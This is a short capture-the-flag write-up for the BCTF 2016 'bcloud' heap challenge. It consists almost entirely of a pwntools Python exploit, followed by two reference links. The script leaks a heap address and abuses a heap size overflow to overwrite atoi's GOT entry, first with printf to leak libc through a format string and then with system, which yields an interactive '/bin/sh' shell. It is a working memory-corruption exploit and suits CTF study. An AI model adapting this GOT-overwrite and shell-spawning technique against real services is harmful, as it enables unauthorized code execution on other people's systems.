bctf2016-bcloud

w00t@ubuntu32svr:~/bctf/bcloud$ cat a.py

#!/usr/bin/env python from pwn import * addr_plt_printf         = 0x080484d0 addr_got_atoi           = 0x0804b03c offset_libc_IO_stderr   = 0x001aa960 offset_libc_system      = 0x00040190 def New(cmn, size, data):     cmn.recvuntil('>>\n')     cmn.sendline('1')     cmn.recvuntil('content:\n')     cmn.sendline(str(size))     cmn.recvuntil('content:\n')     if size>0:         cmn.sendline(data) def Edit(cmn, id_num, data):     cmn.recvuntil('>>\n')     cmn.sendline('3  ')     cmn.recvuntil('id:\n')     cmn.sendline(str(id_num))     cmn.recvuntil('content:\n')     cmn.sendline(data) s = process('./bcloud.9a3bd1d30276b501a51ac8931b3e43c4') s.recvuntil('name:\n') s.send('a'*0x40) buf = s.recv(0x44) print hexdump(buf) buf = s.recvuntil('! ') print hexdump(buf) addr_heap  = buf[:-2] addr_heap  = u32(addr_heap)-8 print('addr_heap      : 0x%08x' % addr_heap) buf=s.recvuntil('Org:\n') print hexdump(buf) s.send('a'*0x40) buf=s.recvuntil('Host:\n') print hexdump(buf) s.sendline(p32(0xffffffff)) New(s, addr_got_atoi-0x4-(addr_heap+0xe0)-0x8, None)      exploit_st1  = p32(0xdeadbeef) exploit_st1 += p32(addr_plt_printf) New(s, 0x100, exploit_st1) s.recvuntil('>>\n') s.sendline('%24$p') addr_libc_IO_stderr = int(s.recv(10),16) addr_libc_base      = addr_libc_IO_stderr - offset_libc_IO_stderr addr_libc_system    = addr_libc_base + offset_libc_system print('addr_libc_base : 0x%08x' % addr_libc_base) exploit_st2  = p32(0xdeadbeef) exploit_st2 += p32(addr_libc_system)      Edit(s, 0, exploit_st2)      s.recvuntil('>>\n') s.sendline('/bin/sh') s.interactive()

### 참조

http://shift-crops.hatenablog.com/entry/2016/03/21/171249

http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt (double free 원재아빠)